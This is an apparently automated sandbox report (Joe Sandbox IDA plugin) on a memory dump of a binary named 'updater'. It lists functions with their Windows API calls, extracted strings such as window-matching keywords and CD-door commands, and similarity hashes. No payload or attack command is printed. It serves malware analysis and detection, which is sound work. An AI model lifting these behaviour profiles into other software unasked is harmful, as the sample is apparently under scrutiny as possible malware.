Instruction Fuzzy Hash: 7E415370E04319AADF119FBA8C49D6EFEF8EF55B10B10452FE519E7291DAB8A400CF51

Function 0036B13A Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0036B17B
__swprintf.LIBCMT ref: 0036B21C
_wcscmp.LIBCMT ref: 0036B22F
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0036B284
_wcscmp.LIBCMT ref: 0036B2C0
GetClassNameW.USER32(?,?,00000400), ref: 0036B2F7
GetDlgCtrlID.USER32(?), ref: 0036B349
GetWindowRect.USER32(?,?), ref: 0036B37F
GetParent.USER32(?), ref: 0036B39D
ScreenToClient.USER32(00000000), ref: 0036B3A4
GetClassNameW.USER32(?,?,00000100), ref: 0036B41E
_wcscmp.LIBCMT ref: 0036B432
GetWindowTextW.USER32(?,?,00000400), ref: 0036B458
_wcscmp.LIBCMT ref: 0036B46C

Part of subcall function 0033385C: _iswctype.LIBCMT ref: 00333864

Strings

%s%u, xrefs: 0036B216

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: ddc50e4d7c5efadfc69c148d8d2849b19b58c1da40c107ada5ffd9f72fde954d
Instruction ID: 71e1e7d9825e242bd80e4f5e03fe5e7ad2826ce7ef6e26ff05d14d9df722fa81
Opcode Fuzzy Hash: ddc50e4d7c5efadfc69c148d8d2849b19b58c1da40c107ada5ffd9f72fde954d
Instruction Fuzzy Hash: BAA1DC71204206ABD71BDF24C885BAAF7E8FF44354F108629F999C6195EB30E995CFA0

Function 0036B8B6 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0036B915

Strings

[REGEXPTITLE:, xrefs: 0036B93D
[CLASS:, xrefs: 0036B965
[ACTIVE, xrefs: 0036B902
ALL, xrefs: 0036B9A9
LAST, xrefs: 0036B8DA
[ALL, xrefs: 0036B9BB
REGEXP=, xrefs: 0036B92A
HANDLE=, xrefs: 0036B90E
CLASSNAME=, xrefs: 0036B952
[LAST, xrefs: 0036B9C2
[HANDLE:, xrefs: 0036B921
ACTIVE, xrefs: 0036B8F0

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 627b1a0094b28a7ecc8328dcb4883fb1e440fb95e2a6a77065f54a7c7ebc581a
Instruction ID: 8c3207a7cee7b2e2e8842ea3ef40a1ea43103555f7882ce88897e3c74ad8df9a
Opcode Fuzzy Hash: 627b1a0094b28a7ecc8328dcb4883fb1e440fb95e2a6a77065f54a7c7ebc581a
Instruction Fuzzy Hash: 1531C231A44219A6CB17FBA0DE43FEDB3A8AF20354F204129F541F50D6EF656E548B92

Function 0036CB97 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 0036CBAA
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0036CBBC
SetWindowTextW.USER32(?,?), ref: 0036CBD3
GetDlgItem.USER32(?,000003EA), ref: 0036CBE8
SetWindowTextW.USER32(00000000,?), ref: 0036CBEE
GetDlgItem.USER32(?,000003E9), ref: 0036CBFE
SetWindowTextW.USER32(00000000,?), ref: 0036CC04
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0036CC25
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0036CC3F
GetWindowRect.USER32(?,?), ref: 0036CC48
SetWindowTextW.USER32(?,?), ref: 0036CCB3
GetDesktopWindow.USER32 ref: 0036CCB9
GetWindowRect.USER32(00000000), ref: 0036CCC0
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0036CD0C
GetClientRect.USER32(?,?), ref: 0036CD19
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0036CD3E
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0036CD69

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: 06deb496159cfe7ea544d76f4aac922e9470a5f9819a7ba985bac04aa9893363
Instruction ID: f679419981e6927a2fe3d59c8aaa9b6f8b5fbf7b264e204b8d4bff179866248b
Opcode Fuzzy Hash: 06deb496159cfe7ea544d76f4aac922e9470a5f9819a7ba985bac04aa9893363
Instruction Fuzzy Hash: 87516D70900709AFDB22DFA8CE89B6EBBF9FF04705F004928E586A25A4C775A955CB50

Function 0039A7DE Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0039A87E
DestroyWindow.USER32(?,?), ref: 0039A8F8

Part of subcall function 00321821: _memmove.LIBCMT ref: 0032185B

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0039A972
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0039A994
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0039A9A7
DestroyWindow.USER32(00000000), ref: 0039A9C9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00310000,00000000), ref: 0039AA00
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0039AA19
GetDesktopWindow.USER32 ref: 0039AA32
GetWindowRect.USER32(00000000), ref: 0039AA39
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0039AA51
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0039AA69

Part of subcall function 003129AB: GetWindowLongW.USER32(?,000000EB), ref: 003129BC

Strings

tooltips_class32, xrefs: 0039A96B, 0039A9F9
0, xrefs: 0039A894

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: 00ac9445fdce9f0f7126e885b226ed681c11c99b8c676cf79242b211b85d12ca
Instruction ID: 144fba0527f7a362a0c293bccf3f24ce0941e7e6fa9a0ec0fd97ad2a843063a4
Opcode Fuzzy Hash: 00ac9445fdce9f0f7126e885b226ed681c11c99b8c676cf79242b211b85d12ca
Instruction Fuzzy Hash: 4371DC71540604AFDB26CF28CC49FAB77E9FB89304F09061DF9868B2A0D730E915DB96

Function 0039CCA6 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 003129E2: GetWindowLongW.USER32(?,000000EB), ref: 003129F3

DragQueryPoint.SHELL32(?,?), ref: 0039CCCF

Part of subcall function 0039B1A9: ClientToScreen.USER32(01561070,?), ref: 0039B1D2
Part of subcall function 0039B1A9: GetWindowRect.USER32(?,?), ref: 0039B248
Part of subcall function 0039B1A9: PtInRect.USER32(?,?,0039C6BC), ref: 0039B258

SendMessageW.USER32(?,000000B0,?,?), ref: 0039CD38
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0039CD43
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0039CD66
_wcscat.LIBCMT ref: 0039CD96
SendMessageW.USER32(?,000000C2,00000001,?), ref: 0039CDAD
SendMessageW.USER32(?,000000B0,?,?), ref: 0039CDC6
SendMessageW.USER32(?,000000B1,?,?), ref: 0039CDDD
SendMessageW.USER32(?,000000B1,?,?), ref: 0039CDFF
DragFinish.SHELL32(?), ref: 0039CE06
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0039CEF9

Strings

@GUI_DRAGID, xrefs: 0039CE71
@GUI_DROPID, xrefs: 0039CE26
@GUI_DRAGFILE, xrefs: 0039CEA8

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: 15546cc4f572e1d7057ce03f36be84c72ef811b27f0e9ee4fa2ae14cb56b92b1
Instruction ID: 8224ab7a4ca2ce73020e577cb7fa430b5c002a2dbbc61ec4408b284726628ea6
Opcode Fuzzy Hash: 15546cc4f572e1d7057ce03f36be84c72ef811b27f0e9ee4fa2ae14cb56b92b1
Instruction Fuzzy Hash: 68617C71508301AFC706EF54DC85E9FBBE8EF89750F000A1EF595971A1DB709A49CB92

Function 016E7979 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ole32.dll), ref: 016E797F
GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 016E7990
GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 016E79A0
GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 016E79B0
GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 016E79C0
GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 016E79D0
GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 016E79E0

Strings

ole32.dll, xrefs: 016E797A
CoResumeClassObjects, xrefs: 016E79CA
CoAddRefServerProcess, xrefs: 016E79AA
CoInitializeEx, xrefs: 016E799A
CoCreateInstanceEx, xrefs: 016E798A
CoSuspendClassObjects, xrefs: 016E79DA
CoReleaseServerProcess, xrefs: 016E79BA

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
API String ID: 667068680-2233174745
Opcode ID: fcc82c01efc324c5452eb6491d1ae17f1ddd97acd6335f748bccd21ce83b3283
Instruction ID: 423064125c48fb72bbab12b4006bad5d2163270b65ec46d353a3ba36f4e0c36f
Opcode Fuzzy Hash: fcc82c01efc324c5452eb6491d1ae17f1ddd97acd6335f748bccd21ce83b3283
Instruction Fuzzy Hash: 13F050E1A41303AAE710BFF69C89C2636EEDA36586300772D791399506F9744A1457A4

Function 003782D5 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 378timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 0037831A
VariantCopy.OLEAUT32(00000000,?), ref: 00378323
VariantClear.OLEAUT32(00000000), ref: 0037832F
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0037841D
__swprintf.LIBCMT ref: 0037844D
VarR8FromDec.OLEAUT32(?,?), ref: 00378479
VariantInit.OLEAUT32(?), ref: 0037852A
SysFreeString.OLEAUT32(?), ref: 003785BE
VariantClear.OLEAUT32(?), ref: 00378618
VariantClear.OLEAUT32(?), ref: 00378627
VariantInit.OLEAUT32(00000000), ref: 00378665

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00378447
Default, xrefs: 003784DA

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 3730832054-3931177956
Opcode ID: c70d91370402090754a97eff62033cedf14a0e8da63e7f0ccdb2d033bb76a3f6
Instruction ID: 825978e6ac95130c0d2b2a40f9d467ff22b2c8c625ac816f3273faf4f475b4ea
Opcode Fuzzy Hash: c70d91370402090754a97eff62033cedf14a0e8da63e7f0ccdb2d033bb76a3f6
Instruction Fuzzy Hash: FDD1BD39644515EBEB369BA9C898A7EB7B8BF05700F14C555E40DAF690CF38E840DBA0

Function 003949CF Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00394A61
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00394AAC

Strings

EXPAND, xrefs: 00394B5E
UNCHECK, xrefs: 00394C88
EXISTS, xrefs: 00394B15
ISCHECKED, xrefs: 00394C2F
COLLAPSE, xrefs: 00394AF2
GETITEMCOUNT, xrefs: 00394B8E
CHECK, xrefs: 00394ACC
GETTEXT, xrefs: 00394BFF
SELECT, xrefs: 00394C5D
GETSELECTED, xrefs: 00394BBC
GETTOTALCOUNT, xrefs: 00394A93

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 1ca9f07db2b72c3d60453b0c86f876bc35140caa8fa6a89df34a58739c2c70ec
Instruction ID: 39696f86e2ba3d6be9d884e67145a60a19c97283bf60aa5c9de8f8b2aa5f47a5
Opcode Fuzzy Hash: 1ca9f07db2b72c3d60453b0c86f876bc35140caa8fa6a89df34a58739c2c70ec
Instruction Fuzzy Hash: 13919D742007119FCF0AEF20C451EAAB7E5AF98354F11885CF8965B7A2DB30ED4ACB81

Function 0037E25D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0037E31F
SystemTimeToFileTime.KERNEL32(?,?), ref: 0037E32F
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0037E33B
__wsplitpath.LIBCMT ref: 0037E399
_wcscat.LIBCMT ref: 0037E3B1
_wcscat.LIBCMT ref: 0037E3C3
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0037E3D8
SetCurrentDirectoryW.KERNEL32(?), ref: 0037E3EC
SetCurrentDirectoryW.KERNEL32(?), ref: 0037E41E
SetCurrentDirectoryW.KERNEL32(?), ref: 0037E43F
_wcscpy.LIBCMT ref: 0037E44B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0037E48A

Strings

*.*, xrefs: 0037E445

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: ae88f03155b75fc8c3e336cbdd26d91e9c98bd58338b28c656b4f33df06d7d9a
Instruction ID: 34167342cd7f9550b482514ead24e1e039faf19d26e6d0f3e5b6cebb39f93ecb
Opcode Fuzzy Hash: ae88f03155b75fc8c3e336cbdd26d91e9c98bd58338b28c656b4f33df06d7d9a
Instruction Fuzzy Hash: AE615A725047459FC726EF60C884A9EB3E8FF89310F04895EF9898B251DB35E945CB92

Function 003123F7 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00311F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00312412,?,00000000,?,?,?,?,00311AA7,00000000,?), ref: 00311F76

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 003124AF
KillTimer.USER32(00000024,?,?,?,?,00311AA7,00000000,?,?,00311EBE,?,?), ref: 0031254A
DestroyAcceleratorTable.USER32(00000000), ref: 0034BFE7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00311AA7,00000000,?,?,00311EBE,?,?), ref: 0034C018
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00311AA7,00000000,?,?,00311EBE,?,?), ref: 0034C02F
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00311AA7,00000000,?,?,00311EBE,?,?), ref: 0034C04B
DeleteObject.GDI32(00000000), ref: 0034C05D

Strings

h:, xrefs: 0031256F

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID: h:
API String ID: 641708696-2924159345
Opcode ID: 058a968b056bbe1a46c41bc22b5aa5f361a9f8a30802f7829190fef6353d8953
Instruction ID: 2e01831c9be8e0c0520b6577b0ec0657a2934e68cf2c964287c84a513ceae092
Opcode Fuzzy Hash: 058a968b056bbe1a46c41bc22b5aa5f361a9f8a30802f7829190fef6353d8953
Instruction Fuzzy Hash: 4561CE31116600DFDB2BDF15D848B7AB7F5FB49312F11951AE4424A960C771B8E0EF90

Function 0037A27B Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0037A2C2

Part of subcall function 00321A36: _memmove.LIBCMT ref: 00321A77

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0037A2E3
__swprintf.LIBCMT ref: 0037A33C
__swprintf.LIBCMT ref: 0037A355
_wprintf.LIBCMT ref: 0037A3FC
_wprintf.LIBCMT ref: 0037A41A

Strings

Line %d (File "%s"):, xrefs: 0037A336, 0037A34F
Error: , xrefs: 0037A3C4
^ ERROR , xrefs: 0037A391
"%s" (%d) : ==> %s:, xrefs: 0037A415
Incorrect parameters to object property !, xrefs: 0037A39E
"%s" (%d) : ==> %s:%s%s, xrefs: 0037A3F7

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-3080491070
Opcode ID: 3af827ff86ef5bbe646b48655ec5636a5a50f25eff29c82c1e66746859777508
Instruction ID: b06287f9568c2b79a8b1fab390e64f45a1a6d5f3abd7bac9615a0feab08ed156
Opcode Fuzzy Hash: 3af827ff86ef5bbe646b48655ec5636a5a50f25eff29c82c1e66746859777508
Instruction Fuzzy Hash: 1951E232900529AACF27EBE0EE46EEEB778EF14340F104155F409B6052EB352F58DBA1

Function 00370065 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,0035F8B8,00000001,0000138C,00000001,00000000,00000001,?,00383FF9,00000000), ref: 0037009A
LoadStringW.USER32(00000000,?,0035F8B8,00000001), ref: 003700A3

Part of subcall function 00321A36: _memmove.LIBCMT ref: 00321A77

GetModuleHandleW.KERNEL32(00000000,003D7310,?,00000FFF,?,?,0035F8B8,00000001,0000138C,00000001,00000000,00000001,?,00383FF9,00000000,00000001), ref: 003700C5
LoadStringW.USER32(00000000,?,0035F8B8,00000001), ref: 003700C8
__swprintf.LIBCMT ref: 00370118
__swprintf.LIBCMT ref: 00370129
_wprintf.LIBCMT ref: 003701D2
MessageBoxW.USER32(00000000,?,?,00011010), ref: 003701E9

Strings

Line %d (File "%s"):, xrefs: 00370112
Error: , xrefs: 003701A0
^ ERROR, xrefs: 0037017E
Line %d:, xrefs: 00370123
%s (%d) : ==> %s: %s %s, xrefs: 003701CD

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: 27765fed6466d8e953000a5150443d12e238417a48692ad54832d56f6737a00c
Instruction ID: 2ea489c5bacb3b20fed1d165aab5ab02ebc156277d60f97305257de3ecde6838
Opcode Fuzzy Hash: 27765fed6466d8e953000a5150443d12e238417a48692ad54832d56f6737a00c
Instruction Fuzzy Hash: 16414D72840129AACB16FBE0DE86EEEB77CAF24341F504155F505BA092DB356F48CBA1

Function 0037A995 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00314D37: __itow.LIBCMT ref: 00314D62
Part of subcall function 00314D37: __swprintf.LIBCMT ref: 00314DAC

CharLowerBuffW.USER32(?,?), ref: 0037AA0E
GetDriveTypeW.KERNEL32 ref: 0037AA5B
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0037AAA3
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0037AADA
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0037AB08

Part of subcall function 00321821: _memmove.LIBCMT ref: 0032185B

Strings

closed, xrefs: 0037AA22, 0037AA2B
close, xrefs: 0037AA14
close cd wait, xrefs: 0037AAF3
set cd door , xrefs: 0037AAA9
wait, xrefs: 0037AAC5
open , xrefs: 0037AA6A
type cdaudio alias cd wait, xrefs: 0037AA86
open, xrefs: 0037AA35

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: f54755c5caff8f54b285d70848132eaa03e1b845eed7fe7dbeadf38a215b34c0
Instruction ID: 4b9ddfc3faf9958d44a816d1f367e320facf5334e09704e8367c394d88d4555b
